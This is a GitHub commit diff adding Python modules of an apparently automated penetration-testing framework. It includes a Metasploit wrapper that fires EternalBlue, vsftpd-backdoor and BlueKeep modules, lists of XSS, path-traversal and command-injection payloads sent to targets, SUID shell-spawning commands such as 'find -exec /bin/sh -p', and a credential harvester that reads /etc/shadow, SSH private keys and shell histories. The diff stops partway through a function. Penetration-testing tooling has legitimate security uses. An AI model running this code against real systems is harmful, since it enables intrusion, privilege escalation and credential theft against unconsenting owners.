Add files via upload

This commit is contained in:
Joas A Santos
2025-12-18 18:18:29 -03:00
committed by GitHub
parent cd904bad0b
commit 078e48b9ed
41 changed files with 4886 additions and 0 deletions
View File
+8
View File
@@ -0,0 +1,8 @@
from .exploitation_tools import (
ExploitDatabase,
MetasploitWrapper,
WebExploiter,
SQLInjector,
RCEExploiter,
BufferOverflowExploiter
)
+363
View File
@@ -0,0 +1,363 @@
#!/usr/bin/env python3
"""
Exploitation Tools - Exploit database, Metasploit wrapper, specialized exploiters
"""
import subprocess
import json
import requests
from typing import Dict, List
import logging
import time
logger = logging.getLogger(__name__)
class ExploitDatabase:
"""Exploit database search and management"""
def __init__(self, config: Dict):
self.config = config
self.db_path = "/usr/share/exploitdb"
def search(self, service: str, version: str = None) -> List[Dict]:
"""Search for exploits"""
logger.info(f"Searching exploits for: {service} {version or ''}")
exploits = []
try:
cmd = ['searchsploit', service]
if version:
cmd.append(version)
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=30
)
# Parse searchsploit output
for line in result.stdout.split('\n'):
if '|' in line and not line.startswith('-'):
parts = line.split('|')
if len(parts) >= 2:
exploits.append({
"title": parts[0].strip(),
"path": parts[1].strip(),
"module": self._path_to_module(parts[1].strip())
})
except Exception as e:
logger.error(f"Exploit search error: {e}")
return exploits
def _path_to_module(self, path: str) -> str:
"""Convert exploit path to module name"""
return path.replace('/', '.').replace('.rb', '').replace('.py', '')
class MetasploitWrapper:
"""Metasploit Framework wrapper"""
def __init__(self, config: Dict):
self.config = config
self.msf_path = config.get('tools', {}).get('metasploit', '/usr/bin/msfconsole')
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Execute Metasploit exploit"""
logger.info(f"Attempting Metasploit exploit on {target}")
service = vulnerability.get('service', '').lower()
port = vulnerability.get('port', 0)
# Map service to exploit module
module = self._select_module(service, vulnerability)
if module:
return self.run_exploit(module, target, port)
return {"success": False, "message": "No suitable module found"}
def _select_module(self, service: str, vulnerability: Dict) -> str:
"""Select appropriate Metasploit module"""
modules = {
'smb': 'exploit/windows/smb/ms17_010_eternalblue',
'ssh': 'auxiliary/scanner/ssh/ssh_login',
'ftp': 'exploit/unix/ftp/vsftpd_234_backdoor',
'http': 'auxiliary/scanner/http/dir_scanner',
'mysql': 'auxiliary/scanner/mysql/mysql_login',
'postgres': 'auxiliary/scanner/postgres/postgres_login',
'rdp': 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
}
return modules.get(service)
def run_exploit(self, module: str, target: str, port: int = None) -> Dict:
"""Run specific Metasploit module"""
logger.info(f"Running module: {module}")
result = {
"success": False,
"module": module,
"target": target,
"output": "",
"shell_access": False
}
try:
# Build MSF resource script
resource_script = self._build_resource_script(module, target, port)
# Execute via msfconsole
cmd = [self.msf_path, '-q', '-r', resource_script]
proc = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=300
)
result["output"] = proc.stdout
# Check for successful exploitation
if 'session opened' in proc.stdout.lower():
result["success"] = True
result["shell_access"] = True
result["shell_info"] = self._extract_shell_info(proc.stdout)
except Exception as e:
logger.error(f"Metasploit execution error: {e}")
result["error"] = str(e)
return result
def _build_resource_script(self, module: str, target: str, port: int = None) -> str:
"""Build MSF resource script"""
script_path = f"/tmp/msf_resource_{int(time.time())}.rc"
script_content = f"""use {module}
set RHOST {target}
"""
if port:
script_content += f"set RPORT {port}\n"
script_content += """set ExitOnSession false
exploit -z
exit
"""
with open(script_path, 'w') as f:
f.write(script_content)
return script_path
def _extract_shell_info(self, output: str) -> Dict:
"""Extract shell session information"""
return {
"type": "meterpreter",
"established": True
}
class WebExploiter:
"""Web application exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit web vulnerabilities"""
vuln_type = vulnerability.get('type')
if vuln_type == 'xss':
return self._exploit_xss(target, vulnerability)
elif vuln_type == 'csrf':
return self._exploit_csrf(target, vulnerability)
elif vuln_type == 'lfi':
return self._exploit_lfi(target, vulnerability)
elif vuln_type == 'rfi':
return self._exploit_rfi(target, vulnerability)
return {"success": False, "message": "Unknown vulnerability type"}
def _exploit_xss(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit XSS vulnerability"""
payloads = [
'<script>alert(1)</script>',
'<img src=x onerror=alert(1)>',
'<svg onload=alert(1)>'
]
for payload in payloads:
try:
response = requests.get(
f"{target}?{vulnerability.get('parameter')}={payload}",
timeout=10
)
if payload in response.text:
return {
"success": True,
"vulnerability": "XSS",
"payload": payload
}
except:
continue
return {"success": False}
def _exploit_csrf(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit CSRF vulnerability"""
return {"success": False, "message": "CSRF exploitation placeholder"}
def _exploit_lfi(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit Local File Inclusion"""
payloads = [
'../../../etc/passwd',
'....//....//....//etc/passwd',
'/etc/passwd'
]
for payload in payloads:
try:
response = requests.get(
f"{target}?file={payload}",
timeout=10
)
if 'root:' in response.text:
return {
"success": True,
"vulnerability": "LFI",
"payload": payload,
"data": response.text[:500]
}
except:
continue
return {"success": False}
def _exploit_rfi(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit Remote File Inclusion"""
return {"success": False, "message": "RFI exploitation placeholder"}
class SQLInjector:
"""SQL Injection exploitation"""
def __init__(self, config: Dict):
self.config = config
self.sqlmap_path = config.get('tools', {}).get('sqlmap', '/usr/bin/sqlmap')
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit SQL injection"""
logger.info(f"Attempting SQL injection on {target}")
result = {
"success": False,
"vulnerability": "SQL Injection",
"databases": [],
"tables": [],
"dumped_data": []
}
try:
# Basic SQLMap scan
cmd = [
self.sqlmap_path,
'-u', target,
'--batch',
'--random-agent',
'--dbs'
]
proc = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=300
)
if 'available databases' in proc.stdout.lower():
result["success"] = True
result["databases"] = self._extract_databases(proc.stdout)
except Exception as e:
logger.error(f"SQL injection error: {e}")
result["error"] = str(e)
return result
def _extract_databases(self, output: str) -> List[str]:
"""Extract database names from SQLMap output"""
databases = []
for line in output.split('\n'):
if '[*]' in line and len(line.strip()) > 4:
db_name = line.split('[*]')[1].strip()
if db_name and not db_name.startswith('available'):
databases.append(db_name)
return databases
class RCEExploiter:
"""Remote Code Execution exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit RCE vulnerability"""
logger.info(f"Attempting RCE on {target}")
# Test various RCE payloads
payloads = [
'; id',
'| id',
'`id`',
'$(id)',
'; whoami',
'| whoami'
]
for payload in payloads:
try:
response = requests.get(
f"{target}?cmd={payload}",
timeout=10
)
# Check for command execution indicators
if any(x in response.text.lower() for x in ['uid=', 'gid=', 'root', 'www-data']):
return {
"success": True,
"vulnerability": "RCE",
"payload": payload,
"output": response.text[:500]
}
except:
continue
return {"success": False}
class BufferOverflowExploiter:
"""Buffer overflow exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit buffer overflow"""
logger.info(f"Attempting buffer overflow on {target}")
# This is a complex topic - placeholder for demonstration
return {
"success": False,
"message": "Buffer overflow exploitation requires specific target analysis"
}
View File
View File
+8
View File
@@ -0,0 +1,8 @@
from .privesc_tools import (
LinuxPrivEsc,
WindowsPrivEsc,
KernelExploiter,
MisconfigFinder,
CredentialHarvester,
SudoExploiter
)
+480
View File
@@ -0,0 +1,480 @@
#!/usr/bin/env python3
"""
Privilege Escalation Tools - Linux, Windows, Kernel exploits, credential harvesting
"""
import subprocess
import json
import re
from typing import Dict, List
import logging
import base64
logger = logging.getLogger(__name__)
class LinuxPrivEsc:
"""Linux privilege escalation"""
def __init__(self, config: Dict):
self.config = config
def enumerate(self) -> Dict:
"""Enumerate Linux system for privilege escalation vectors"""
logger.info("Enumerating Linux system")
info = {
"os": "linux",
"kernel_version": self._get_kernel_version(),
"suid_binaries": self._find_suid_binaries(),
"sudo_permissions": self._check_sudo(),
"writable_paths": self._find_writable_paths(),
"cron_jobs": self._check_cron_jobs(),
"capabilities": self._check_capabilities()
}
return info
def _get_kernel_version(self) -> str:
"""Get kernel version"""
try:
result = subprocess.run(
['uname', '-r'],
capture_output=True,
text=True,
timeout=5
)
return result.stdout.strip()
except:
return "unknown"
def _find_suid_binaries(self) -> List[str]:
"""Find SUID binaries"""
logger.info("Searching for SUID binaries")
suid_bins = []
try:
cmd = 'find / -perm -4000 -type f 2>/dev/null'
result = subprocess.run(
cmd,
shell=True,
capture_output=True,
text=True,
timeout=60
)
suid_bins = result.stdout.strip().split('\n')
except Exception as e:
logger.error(f"SUID search error: {e}")
return suid_bins
def _check_sudo(self) -> List[str]:
"""Check sudo permissions"""
try:
result = subprocess.run(
['sudo', '-l'],
capture_output=True,
text=True,
timeout=5
)
return result.stdout.strip().split('\n')
except:
return []
def _find_writable_paths(self) -> List[str]:
"""Find writable paths in $PATH"""
writable = []
try:
paths = subprocess.run(
['echo', '$PATH'],
capture_output=True,
text=True,
shell=True
).stdout.strip().split(':')
for path in paths:
if subprocess.run(['test', '-w', path]).returncode == 0:
writable.append(path)
except:
pass
return writable
def _check_cron_jobs(self) -> List[str]:
"""Check cron jobs"""
cron_files = [
'/etc/crontab',
'/etc/cron.d/*',
'/var/spool/cron/crontabs/*'
]
jobs = []
for cron_file in cron_files:
try:
with open(cron_file, 'r') as f:
jobs.extend(f.readlines())
except:
continue
return jobs
def _check_capabilities(self) -> List[str]:
"""Check file capabilities"""
try:
result = subprocess.run(
['getcap', '-r', '/', '2>/dev/null'],
capture_output=True,
text=True,
timeout=60,
shell=True
)
return result.stdout.strip().split('\n')
except:
return []
def exploit_suid(self, binary: str) -> Dict:
"""Exploit SUID binary"""
logger.info(f"Attempting SUID exploit: {binary}")
result = {
"success": False,
"technique": "suid_exploitation",
"binary": binary
}
# Known SUID exploits
exploits = {
'/usr/bin/cp': self._exploit_cp,
'/usr/bin/mv': self._exploit_mv,
'/usr/bin/find': self._exploit_find,
'/usr/bin/vim': self._exploit_vim,
'/usr/bin/nano': self._exploit_nano,
'/bin/bash': self._exploit_bash
}
if binary in exploits:
try:
result = exploits[binary]()
except Exception as e:
result["error"] = str(e)
return result
def _exploit_find(self) -> Dict:
"""Exploit find SUID"""
try:
cmd = 'find . -exec /bin/sh -p \\; -quit'
result = subprocess.run(
cmd,
shell=True,
capture_output=True,
text=True,
timeout=10
)
return {
"success": True,
"technique": "find_suid",
"shell_obtained": True
}
except:
return {"success": False}
def _exploit_vim(self) -> Dict:
"""Exploit vim SUID"""
return {"success": False, "message": "Vim SUID exploitation placeholder"}
def _exploit_nano(self) -> Dict:
"""Exploit nano SUID"""
return {"success": False, "message": "Nano SUID exploitation placeholder"}
def _exploit_cp(self) -> Dict:
"""Exploit cp SUID"""
return {"success": False, "message": "CP SUID exploitation placeholder"}
def _exploit_mv(self) -> Dict:
"""Exploit mv SUID"""
return {"success": False, "message": "MV SUID exploitation placeholder"}
def _exploit_bash(self) -> Dict:
"""Exploit bash SUID"""
try:
cmd = 'bash -p'
result = subprocess.run(
cmd,
shell=True,
capture_output=True,
text=True,
timeout=10
)
return {
"success": True,
"technique": "bash_suid",
"shell_obtained": True
}
except:
return {"success": False}
def exploit_path_hijacking(self, writable_path: str) -> Dict:
"""Exploit PATH hijacking"""
logger.info(f"Attempting PATH hijacking: {writable_path}")
return {
"success": False,
"message": "PATH hijacking exploitation placeholder"
}
class WindowsPrivEsc:
"""Windows privilege escalation"""
def __init__(self, config: Dict):
self.config = config
def enumerate(self) -> Dict:
"""Enumerate Windows system"""
logger.info("Enumerating Windows system")
info = {
"os": "windows",
"version": self._get_windows_version(),
"services": self._enumerate_services(),
"always_install_elevated": self._check_always_install_elevated(),
"unquoted_service_paths": self._find_unquoted_paths(),
"privileges": self._check_privileges()
}
return info
def _get_windows_version(self) -> str:
"""Get Windows version"""
try:
result = subprocess.run(
['ver'],
capture_output=True,
text=True,
shell=True,
timeout=5
)
return result.stdout.strip()
except:
return "unknown"
def _enumerate_services(self) -> List[Dict]:
"""Enumerate Windows services"""
services = []
try:
result = subprocess.run(
['sc', 'query'],
capture_output=True,
text=True,
timeout=30
)
# Parse service output
for line in result.stdout.split('\n'):
if 'SERVICE_NAME:' in line:
services.append({"name": line.split(':')[1].strip()})
except:
pass
return services
def _check_always_install_elevated(self) -> bool:
"""Check AlwaysInstallElevated registry key"""
try:
# Check both HKLM and HKCU
keys = [
r'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer',
r'HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer'
]
for key in keys:
result = subprocess.run(
['reg', 'query', key, '/v', 'AlwaysInstallElevated'],
capture_output=True,
text=True
)
if '0x1' in result.stdout:
return True
except:
pass
return False
def _find_unquoted_paths(self) -> List[str]:
"""Find unquoted service paths"""
unquoted = []
try:
result = subprocess.run(
['wmic', 'service', 'get', 'name,pathname,displayname,startmode'],
capture_output=True,
text=True,
timeout=30
)
for line in result.stdout.split('\n'):
if 'C:\\' in line and line.count('"') < 2:
unquoted.append(line)
except:
pass
return unquoted
def _check_privileges(self) -> List[str]:
"""Check current user privileges"""
try:
result = subprocess.run(
['whoami', '/priv'],
capture_output=True,
text=True,
timeout=10
)
return result.stdout.strip().split('\n')
except:
return []
def exploit_service(self, service: Dict) -> Dict:
"""Exploit service misconfiguration"""
logger.info(f"Attempting service exploitation: {service.get('name')}")
return {
"success": False,
"message": "Windows service exploitation placeholder"
}
def exploit_msi(self) -> Dict:
"""Exploit AlwaysInstallElevated"""
logger.info("Attempting AlwaysInstallElevated exploitation")
# Generate malicious MSI
# This would create and install a privileged MSI package
return {
"success": False,
"message": "AlwaysInstallElevated exploitation placeholder"
}
def impersonate_token(self) -> Dict:
"""Token impersonation attack"""
logger.info("Attempting token impersonation")
return {
"success": False,
"message": "Token impersonation placeholder"
}
class KernelExploiter:
"""Kernel exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit_linux(self, kernel_version: str) -> Dict:
"""Exploit Linux kernel"""
logger.info(f"Attempting kernel exploit: {kernel_version}")
# Map kernel versions to known exploits
exploits = {
'DirtyCow': ['2.6.22', '4.8.3'],
'OverlayFS': ['3.13.0', '4.3.3']
}
return {
"success": False,
"message": "Kernel exploitation requires specific exploit compilation"
}
class MisconfigFinder:
"""Find misconfigurations"""
def __init__(self, config: Dict):
self.config = config
def find(self, os_type: str) -> List[Dict]:
"""Find security misconfigurations"""
if os_type == "linux":
return self._find_linux_misconfigs()
elif os_type == "windows":
return self._find_windows_misconfigs()
return []
def _find_linux_misconfigs(self) -> List[Dict]:
"""Find Linux misconfigurations"""
return []
def _find_windows_misconfigs(self) -> List[Dict]:
"""Find Windows misconfigurations"""
return []
class CredentialHarvester:
"""Harvest credentials"""
def __init__(self, config: Dict):
self.config = config
def harvest_linux(self) -> List[Dict]:
"""Harvest Linux credentials"""
logger.info("Harvesting Linux credentials")
credentials = []
# Check common credential locations
locations = [
'/etc/shadow',
'/etc/passwd',
'~/.ssh/id_rsa',
'~/.bash_history',
'~/.mysql_history'
]
for location in locations:
try:
with open(location, 'r') as f:
credentials.append({
"source": location,
"data": f.read()[:500]
})
except:
continue
return credentials
def harvest_windows(self) -> List[Dict]:
"""Harvest Windows credentials"""
logger.info("Harvesting Windows credentials")
# Use mimikatz or similar tools
# Placeholder for demonstration
return []
class SudoExploiter:
"""Sudo exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit(self, sudo_permission: str) -> Dict:
"""Exploit sudo permission"""
logger.info(f"Attempting sudo exploit: {sudo_permission}")
return {
"success": False,
"message": "Sudo exploitation placeholder"
}
+4
View File
@@ -0,0 +1,4 @@
from .network_scanner import NetworkScanner
from .osint_collector import OSINTCollector
from .dns_enumerator import DNSEnumerator
from .subdomain_finder import SubdomainFinder
+48
View File
@@ -0,0 +1,48 @@
#!/usr/bin/env python3
"""
DNSEnumerator - A placeholder for a DNS enumeration tool.
"""
import logging
from typing import Dict
logger = logging.getLogger(__name__)
class DNSEnumerator:
"""
A class for enumerating DNS records.
This is a placeholder and should be expanded.
"""
def __init__(self, config: Dict):
"""
Initializes the DNSEnumerator.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
logger.info("DNSEnumerator initialized (placeholder)")
def enumerate(self, target: str) -> Dict:
"""
Enumerates DNS records for a given domain.
Args:
target (str): The domain name to enumerate.
Returns:
Dict: A dictionary containing DNS records.
"""
logger.warning(f"DNS enumeration for {target} is a placeholder. Returning empty data.")
# Placeholder: In a real implementation, this would use libraries
# like dnspython to query for A, AAAA, MX, NS, TXT, etc. records.
return {
"target": target,
"records": {
"A": [],
"AAAA": [],
"MX": [],
"NS": [],
"TXT": []
},
"notes": "No DNS enumeration implemented yet."
}
+64
View File
@@ -0,0 +1,64 @@
#!/usr/bin/env python3
"""
NetworkScanner - A tool for scanning networks to find open ports.
"""
import socket
import logging
from typing import Dict, List
logger = logging.getLogger(__name__)
class NetworkScanner:
"""
A class to scan for open ports on a target machine.
"""
def __init__(self, config: Dict):
"""
Initializes the NetworkScanner.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
self.common_ports = [
21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445,
993, 995, 1723, 3306, 3389, 5900, 8080
]
def scan(self, target: str) -> Dict:
"""
Scans a target for open ports.
Args:
target (str): The IP address or hostname to scan.
Returns:
Dict: A dictionary containing the list of open ports found.
"""
logger.info(f"Starting network scan on {target}")
open_ports = []
try:
target_ip = socket.gethostbyname(target)
logger.info(f"Resolved {target} to {target_ip}")
for port in self.common_ports:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = sock.connect_ex((target_ip, port))
if result == 0:
logger.info(f"Port {port} is open on {target}")
open_ports.append(port)
sock.close()
except socket.gaierror:
logger.error(f"Hostname could not be resolved: {target}")
return {"error": "Hostname could not be resolved."}
except socket.error:
logger.error(f"Could not connect to server: {target}")
return {"error": "Could not connect to server."}
logger.info(f"Network scan finished. Found {len(open_ports)} open ports.")
return {"target": target, "open_ports": open_ports}
+43
View File
@@ -0,0 +1,43 @@
#!/usr/bin/env python3
"""
OSINTCollector - A placeholder for an OSINT gathering tool.
"""
import logging
from typing import Dict
logger = logging.getLogger(__name__)
class OSINTCollector:
"""
A class for collecting Open Source Intelligence.
This is a placeholder and should be expanded with actual OSINT tools.
"""
def __init__(self, config: Dict):
"""
Initializes the OSINTCollector.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
logger.info("OSINTCollector initialized (placeholder)")
def collect(self, target: str) -> Dict:
"""
Collects OSINT data for a given target.
Args:
target (str): The target (e.g., domain name, company name).
Returns:
Dict: A dictionary containing OSINT findings.
"""
logger.warning(f"OSINT collection for {target} is a placeholder. Returning empty data.")
# Placeholder: In a real implementation, this would query APIs like
# Google, Shodan, Have I Been Pwned, etc.
return {
"target": target,
"emails": [],
"leaked_credentials": [],
"metadata": "No OSINT collection implemented yet."
}
+417
View File
@@ -0,0 +1,417 @@
#!/usr/bin/env python3
"""
Reconnaissance Tools - Network scanning, web recon, OSINT, DNS enumeration
"""
import subprocess
import json
import re
import socket
import requests
from typing import Dict, List
import logging
from urllib.parse import urlparse
import dns.resolver
logger = logging.getLogger(__name__)
class NetworkScanner:
"""Network scanning and port enumeration"""
def __init__(self, config: Dict):
self.config = config
self.nmap_path = config.get('tools', {}).get('nmap', '/usr/bin/nmap')
def scan(self, target: str) -> Dict:
"""Perform comprehensive network scan"""
logger.info(f"Scanning target: {target}")
results = {
"target": target,
"hosts": {},
"summary": {}
}
try:
# Quick scan for open ports
quick_scan = self._nmap_scan(target, "-sS -T4 -p-")
results["hosts"].update(quick_scan)
# Service version detection
if results["hosts"]:
version_scan = self._nmap_scan(target, "-sV -sC")
results["hosts"].update(version_scan)
# Vulnerability scan
vuln_scan = self._nmap_vuln_scan(target)
results["vulnerabilities"] = vuln_scan
results["summary"] = self._generate_summary(results["hosts"])
except Exception as e:
logger.error(f"Network scan error: {e}")
results["error"] = str(e)
return results
def _nmap_scan(self, target: str, options: str) -> Dict:
"""Execute nmap scan"""
try:
cmd = f"{self.nmap_path} {options} {target} -oX -"
result = subprocess.run(
cmd.split(),
capture_output=True,
timeout=300,
text=True
)
return self._parse_nmap_output(result.stdout)
except Exception as e:
logger.error(f"Nmap scan error: {e}")
return {}
def _nmap_vuln_scan(self, target: str) -> List[Dict]:
"""Scan for vulnerabilities using NSE scripts"""
try:
cmd = f"{self.nmap_path} --script vuln {target}"
result = subprocess.run(
cmd.split(),
capture_output=True,
timeout=600,
text=True
)
return self._parse_vuln_output(result.stdout)
except Exception as e:
logger.error(f"Vulnerability scan error: {e}")
return []
def _parse_nmap_output(self, output: str) -> Dict:
"""Parse nmap XML output"""
hosts = {}
# Simple parsing - in production, use proper XML parser
ip_pattern = r'(\d+\.\d+\.\d+\.\d+)'
port_pattern = r'(\d+)/tcp\s+open\s+(\S+)'
current_ip = None
for line in output.split('\n'):
ip_match = re.search(ip_pattern, line)
if ip_match and 'Nmap scan report' in line:
current_ip = ip_match.group(1)
hosts[current_ip] = {
"ip": current_ip,
"open_ports": [],
"os": "unknown"
}
port_match = re.search(port_pattern, line)
if port_match and current_ip:
hosts[current_ip]["open_ports"].append({
"port": int(port_match.group(1)),
"service": port_match.group(2),
"version": "unknown"
})
return hosts
def _parse_vuln_output(self, output: str) -> List[Dict]:
"""Parse vulnerability scan output"""
vulnerabilities = []
# Extract CVEs and vulnerability info
cve_pattern = r'(CVE-\d{4}-\d+)'
for match in re.finditer(cve_pattern, output):
vulnerabilities.append({
"cve": match.group(1),
"severity": "unknown"
})
return vulnerabilities
def _generate_summary(self, hosts: Dict) -> Dict:
"""Generate scan summary"""
total_hosts = len(hosts)
total_ports = sum(len(h.get("open_ports", [])) for h in hosts.values())
services = set()
for host in hosts.values():
for port in host.get("open_ports", []):
services.add(port.get("service"))
return {
"total_hosts": total_hosts,
"total_open_ports": total_ports,
"unique_services": list(services)
}
class WebRecon:
"""Web application reconnaissance"""
def __init__(self, config: Dict):
self.config = config
def analyze(self, url: str) -> Dict:
"""Analyze web application"""
logger.info(f"Analyzing web application: {url}")
results = {
"url": url,
"technologies": [],
"headers": {},
"security_headers": {},
"endpoints": [],
"forms": [],
"vulnerabilities": []
}
try:
# Technology detection
results["technologies"] = self._detect_technologies(url)
# Header analysis
results["headers"], results["security_headers"] = self._analyze_headers(url)
# Endpoint discovery
results["endpoints"] = self._discover_endpoints(url)
# Form detection
results["forms"] = self._detect_forms(url)
# Quick vulnerability checks
results["vulnerabilities"] = self._check_vulnerabilities(url)
except Exception as e:
logger.error(f"Web recon error: {e}")
results["error"] = str(e)
return results
def _detect_technologies(self, url: str) -> List[str]:
"""Detect web technologies"""
technologies = []
try:
response = requests.get(url, timeout=10, verify=False)
# Check headers for technology indicators
server = response.headers.get('Server', '')
if server:
technologies.append(f"Server: {server}")
x_powered_by = response.headers.get('X-Powered-By', '')
if x_powered_by:
technologies.append(f"X-Powered-By: {x_powered_by}")
# Check content for framework indicators
content = response.text.lower()
if 'wordpress' in content:
technologies.append("WordPress")
if 'joomla' in content:
technologies.append("Joomla")
if 'drupal' in content:
technologies.append("Drupal")
if 'django' in content:
technologies.append("Django")
if 'laravel' in content:
technologies.append("Laravel")
except Exception as e:
logger.error(f"Technology detection error: {e}")
return technologies
def _analyze_headers(self, url: str) -> tuple:
"""Analyze HTTP headers"""
headers = {}
security_headers = {}
try:
response = requests.head(url, timeout=10, verify=False)
headers = dict(response.headers)
# Check for security headers
security_checks = [
'X-Frame-Options',
'X-Content-Type-Options',
'Strict-Transport-Security',
'Content-Security-Policy',
'X-XSS-Protection'
]
for header in security_checks:
if header in headers:
security_headers[header] = headers[header]
else:
security_headers[header] = "Missing"
except Exception as e:
logger.error(f"Header analysis error: {e}")
return headers, security_headers
def _discover_endpoints(self, url: str) -> List[str]:
"""Discover endpoints using common paths"""
endpoints = []
common_paths = [
'/admin', '/login', '/api', '/config', '/backup',
'/admin.php', '/phpinfo.php', '/info.php',
'/robots.txt', '/sitemap.xml', '/.git', '/.env'
]
parsed = urlparse(url)
base_url = f"{parsed.scheme}://{parsed.netloc}"
for path in common_paths:
try:
response = requests.head(
f"{base_url}{path}",
timeout=5,
verify=False,
allow_redirects=False
)
if response.status_code < 400:
endpoints.append(path)
except:
continue
return endpoints
def _detect_forms(self, url: str) -> List[Dict]:
"""Detect forms on webpage"""
forms = []
try:
response = requests.get(url, timeout=10, verify=False)
# Simple form detection
form_pattern = r'<form[^>]*>(.*?)</form>'
for match in re.finditer(form_pattern, response.text, re.DOTALL):
forms.append({
"action": re.search(r'action=["\']([^"\']+)["\']', match.group(0)),
"method": re.search(r'method=["\']([^"\']+)["\']', match.group(0))
})
except Exception as e:
logger.error(f"Form detection error: {e}")
return forms
def _check_vulnerabilities(self, url: str) -> List[str]:
"""Quick vulnerability checks"""
vulnerabilities = []
try:
# SQL Injection test
test_url = f"{url}?id=1'"
response = requests.get(test_url, timeout=10, verify=False)
if 'sql' in response.text.lower() or 'mysql' in response.text.lower():
vulnerabilities.append("Potential SQL Injection")
# XSS test
test_url = f"{url}?q=<script>alert(1)</script>"
response = requests.get(test_url, timeout=10, verify=False)
if '<script>alert(1)</script>' in response.text:
vulnerabilities.append("Potential XSS")
except Exception as e:
logger.error(f"Vulnerability check error: {e}")
return vulnerabilities
class OSINTCollector:
"""Open Source Intelligence collection"""
def __init__(self, config: Dict):
self.config = config
def collect(self, target: str) -> Dict:
"""Collect OSINT data"""
logger.info(f"Collecting OSINT for: {target}")
return {
"target": target,
"emails": self._find_emails(target),
"social_media": self._find_social_media(target),
"data_breaches": self._check_breaches(target),
"metadata": self._collect_metadata(target)
}
def _find_emails(self, target: str) -> List[str]:
"""Find email addresses"""
# Placeholder - would use theHarvester or similar
return []
def _find_social_media(self, target: str) -> Dict:
"""Find social media profiles"""
return {}
def _check_breaches(self, target: str) -> List[str]:
"""Check for data breaches"""
return []
def _collect_metadata(self, target: str) -> Dict:
"""Collect metadata"""
return {}
class DNSEnumerator:
"""DNS enumeration"""
def __init__(self, config: Dict):
self.config = config
def enumerate(self, domain: str) -> Dict:
"""Enumerate DNS records"""
logger.info(f"Enumerating DNS for: {domain}")
records = {
"domain": domain,
"A": [],
"AAAA": [],
"MX": [],
"NS": [],
"TXT": [],
"SOA": []
}
record_types = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'SOA']
for rtype in record_types:
try:
answers = dns.resolver.resolve(domain, rtype)
records[rtype] = [str(rdata) for rdata in answers]
except:
continue
return records
class SubdomainFinder:
"""Subdomain discovery"""
def __init__(self, config: Dict):
self.config = config
def find(self, domain: str) -> List[str]:
"""Find subdomains"""
logger.info(f"Finding subdomains for: {domain}")
subdomains = []
common_subdomains = [
'www', 'mail', 'ftp', 'admin', 'test', 'dev',
'staging', 'api', 'blog', 'shop', 'portal'
]
for sub in common_subdomains:
subdomain = f"{sub}.{domain}"
try:
socket.gethostbyname(subdomain)
subdomains.append(subdomain)
except:
continue
return subdomains
+39
View File
@@ -0,0 +1,39 @@
#!/usr/bin/env python3
"""
SubdomainFinder - A placeholder for a subdomain discovery tool.
"""
import logging
from typing import Dict, List
logger = logging.getLogger(__name__)
class SubdomainFinder:
"""
A class for finding subdomains of a given domain.
This is a placeholder and should be expanded.
"""
def __init__(self, config: Dict):
"""
Initializes the SubdomainFinder.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
logger.info("SubdomainFinder initialized (placeholder)")
def find(self, target: str) -> List[str]:
"""
Finds subdomains for a given domain.
Args:
target (str): The domain name to search subdomains for.
Returns:
List[str]: A list of found subdomains.
"""
logger.warning(f"Subdomain finding for {target} is a placeholder. Returning empty data.")
# Placeholder: In a real implementation, this would use techniques like
# querying Certificate Transparency logs, using search engines, or
# brute-forcing with a wordlist.
return []
+1
View File
@@ -0,0 +1 @@
from .web_recon import WebRecon
+185
View File
@@ -0,0 +1,185 @@
#!/usr/bin/env python3
"""
WebRecon - A tool for web reconnaissance and basic vulnerability scanning.
"""
import requests
import logging
from typing import Dict, List
from urllib.parse import urljoin, urlencode # Added urlencode
logger = logging.getLogger(__name__)
class WebRecon:
"""
A class for performing basic web reconnaissance and simple vulnerability checks.
"""
def __init__(self, config: Dict):
"""
Initializes the WebRecon tool.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
# Expanded wordlist for discovering common paths
self.wordlist = [
"admin", "login", "dashboard", "api", "robots.txt", "sitemap.xml",
"test", "dev", "backup", "v1", "v2", "v3", ".git", ".env", "config.php",
"phpinfo.php", "index.php", "main.php", "home.php", "portal.php",
"upload", "files", "images", "assets", "downloads", "includes",
"src", "backup.zip", "data.sql", "admin.bak", "panel"
]
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
}
self.test_parameters = ["id", "page", "cat", "item", "view", "name", "query", "search"] # Added for vulnerability testing
def analyze(self, target: str) -> Dict:
"""
Analyzes a web target to find common directories, files, and basic vulnerabilities.
Args:
target (str): The base URL to analyze. It should include the scheme (http/https).
Returns:
Dict: A dictionary containing the findings including discovered paths and vulnerabilities.
"""
logger.info(f"Starting web reconnaissance and basic vulnerability scan on {target}")
findings = {
"target": target,
"status_code": None,
"headers": {},
"discovered_paths": [],
"vulnerabilities": [] # New key for vulnerabilities
}
if not target.startswith(('http://', 'https://')):
target = f"http://{target}"
logger.info(f"No scheme provided. Defaulting to http: {target}")
# 1. Check base URL connectivity and headers
try:
